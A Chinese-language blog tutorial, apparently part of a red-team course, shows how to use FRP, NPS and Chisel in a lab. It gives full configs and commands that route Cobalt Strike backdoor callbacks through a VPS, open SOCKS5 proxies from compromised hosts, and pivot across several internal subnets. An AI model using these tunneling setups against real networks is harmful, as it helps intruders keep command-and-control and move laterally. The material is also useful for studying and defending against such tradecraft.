内网对抗-隧道技术篇&防火墙组策略&FRP&NPS&Chisel&Socks代理&端口映射&C2上线

知识点:

1、隧道技术篇-传输层-工具项目-Frp&Nps&Chisel
2、隧道技术篇-传输层-端口转发&Socks建立&C2上线

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
Frp
Frp是专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。
项目下载:https://github.com/fatedier/frp
下载下来有客户端和服务端两个不同文件,什么样的操作系统就下载对应的系统版本,但是工具的版本号最好要一致。

Nps
Nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,DNS解析等),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。
项目下载:https://github.com/ehang-io/nps
下载下来有客户端和服务端两个不同文件,什么样的操作系统就下载对应的系统版本,但是工具的版本号最好要一致。

在这里插入图片描述

Chisel
Chisel 是一个快速 TCP/UDP 隧道,通过 HTTP 传输,通过 SSH 保护。单个可执行文件包括客户端和服务器。用 Go(golang)编写。 Chisel 主要用于穿过防火墙,但也可用于为网络提供安全端点。
项目下载:https://github.com/jpillora/chisel
下载下来只有一个文件(既担任服务端,又担任客户端)

一、演示案例-内网穿透-C2上线-Frp&NPS&Chisel

frp

1、VPS-服务端-下载-解压-修改-启动

阿里云主机记得修改安全组配置出入口
修改配置文件frps.ini:
[common]
bind_port = 7000

VPS上启动服务端:
./frps -c ./frps.ini

2、内网kali-客户端-下载-解压-修改-启动

修改配置文件frpc.ini:
[common]
serverAddr = "47.98.210.85"
serverPort = 7000
[[proxies]]
name = "test-tcp"
type = "tcp"
localIP = "127.0.0.1"
localPort = 5555
remotePort = 6666

内网kali启动客户端:
 ./frpc -c ./frpc.ini

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3、CS配置监听器

监听器1:VPS-IP:6666
监听器2:CS-IP:5555
后门生成:监听器1

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

nps

1、VPS启动

./nps

在这里插入图片描述
在这里插入图片描述

http://VPS-IP:8080/ admin/123

在这里插入图片描述

2、创建客户端,生成密匙

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

./npc -server=VPS-IP:8024 -vkey=xxxxxx

在这里插入图片描述
在这里插入图片描述

3、添加协议隧道,绑定指向

远程绑定6666,指向本地5555
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4、CS配置监听器

监听器1:VPS-IP:6666
监听器2:CS-IP:5555
后门生成:监听器1

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

chisel

1、vps-建立服务端监听1234

./chisel server -p 1234 --reverse

在这里插入图片描述

2、建立客户端连接服务端后将141上5555给到服务端6666上

./chisel client -v 47.98.210.85:1234 R:0.0.0.0:6666:192.168.139.141:5555

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

二、演示案例-内网穿透-Socks建立-Frp&NPS&Chisel

网络拓扑

本地计算机-攻击机-只能和192.168.230.*通信

外网VPS
IP地址:114.132.219.xx

内网主机1(Win10,两个网卡)
网卡1 IP地址:192.168.230.*
网卡2 IP地址:192.168.10.128

内网主机2(Win10,两个网卡)
网卡1 IP地址:192.168.10.129
网卡2 IP地址:192.168.20.128

内网主机3(Win7,单网卡)
IP地址:192.168.20.129

frp

1、启动服务端(VPS)

./frps -c frps.toml
[common]
bind_addr = 0.0.0.0
bind_port = 7000

在这里插入图片描述

2、启动客户端(放到目标服务器上运行)

frpc -c frpc.toml
[common]
server_addr = 114.132.219.xx
server_port = 7000
tls_enable = ture    
pool_count = 5

[plugin_socks]
type = tcp
remote_port = 6000
plugin = socks5
plugin_user = admin
plugin_passwd = admin@123
use_encryption = true
use_compression = true
1、连接114.132.219.xx上的frp服务端
2、将远程服务端的6000端口设置为socks代理 采用tcp协议  备注名为: plugin_socks(可自定义)
3、采用socks5代理并设置用户密码

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
成功访问10网段,但是20网段是访问不到的。

3、多层网络穿透

内网主机1(Win10,两个网卡)这个就要即当客户端也要当服务端
网卡1 IP地址:192.168.230.*
网卡2 IP地址:192.168.10.128

[common]
bind_addr = 0.0.0.0
bind_port = 7000

在这里插入图片描述

内网主机2(Win10,两个网卡) 设置客户端
网卡1 IP地址:192.168.10.129
网卡2 IP地址:192.168.20.128

[common]
server_addr = 192.168.10.128 
server_port = 7000
tls_enable = ture    
pool_count = 5

[plugin_socks]
type = tcp
remote_port = 6001
plugin = socks5
plugin_user = admin
plugin_passwd = 123456
use_encryption = true
use_compression = true
1、连接192.168.10.128上的frp服务端
2、将远程服务端的6001端口设置为socks代理 采用tcp协议  备注名为: plugin_socks(可自定义)
3、采用socks5代理并设置用户密码

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

nps

1、建立Socks/HTTP隧道

VPS上运行nps服务端
在这里插入图片描述
在这里插入图片描述

http://xxxx:8080 

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

2、配合Proxifier规则配置测试

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
成功访问10网段,但是20网段是访问不到的。

3、多层网络穿透

内网主机1(Win10,两个网卡)这个就要即当客户端也要当服务端
网卡1 IP地址:192.168.230.*
网卡2 IP地址:192.168.10.128
在这里插入图片描述
因为本地proxifier已经设置为VPS的socks代理是能访问到10网段的,直接访问192.168.10.128:8080
在这里插入图片描述
在这里插入图片描述
内网主机2(Win10,两个网卡) 设置客户端
网卡1 IP地址:192.168.10.129
网卡2 IP地址:192.168.20.128
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

chisel

1、目标服务器建立服务端监听8080

chisel.exe server -p 8080 --reverse --socks5

在这里插入图片描述

2、本地电脑建立客户端连接服务端后将使用Socks服务

chisel client 192.168.230.X:8080 socks

在这里插入图片描述
真实内网环境下目标服务器肯定有一个外网IP,把192.168.230.x改为外网IP就行了。
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
现在10网段是能够访问,但是20网段访问不到。

3、多层网络穿透

内网主机1(Win10,两个网卡)运行服务端
网卡1 IP地址:192.168.230.*
网卡2 IP地址:192.168.10.128

内网主机2(Win10,两个网卡)运行客户端并转发socks代理端口
网卡1 IP地址:192.168.10.129
网卡2 IP地址:192.168.20.128

chisel.exe client 192.168.10.128:8080 R:0.0.0.0:1088:socks

在这里插入图片描述
在这里插入图片描述
本地电脑(Win10)设置proxifier代理
本地电脑只能和192.168.230.*网段通信

方法一:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
方法二:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

三、演示案例-内网穿透-端口映射转发-Frp&NPS&Chisel

frp

1、服务端启动(vps)

frps -c frps.ini

[common]
bind_port = 7000

在这里插入图片描述

2、客户端启动(目标服务器上运行)中继

frpc -c frpc.ini

[common]
serverAddr = "47.98.210.85" # 连接FRP服务端
serverPort = 7000

[WEB]
type = tcp
local_ip = 127.0.0.1 # 可以设置具体IP,也就是同一网段下可通信的其他主机IP
local_port = 80 # 假设你想转发的是本地的80端口
remote_port = 8888 # 你希望在服务器上公开的端口

在这里插入图片描述
在这里插入图片描述

nps

VPS上运行服务端

./nps

1、新增客户端

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

2、添加协议隧道,绑定目标及端口

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

chisel

1、VPS建立服务端监听8888

./chisel server -p 8888 --reverse

在这里插入图片描述

2、目标服务器建立客户端连接服务端后将10.129上80端口给到服务端8088端口上

./chisel client -v 114.132.219.xx:8888 R:0.0.0.0:8080:192.168.10.129:80

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值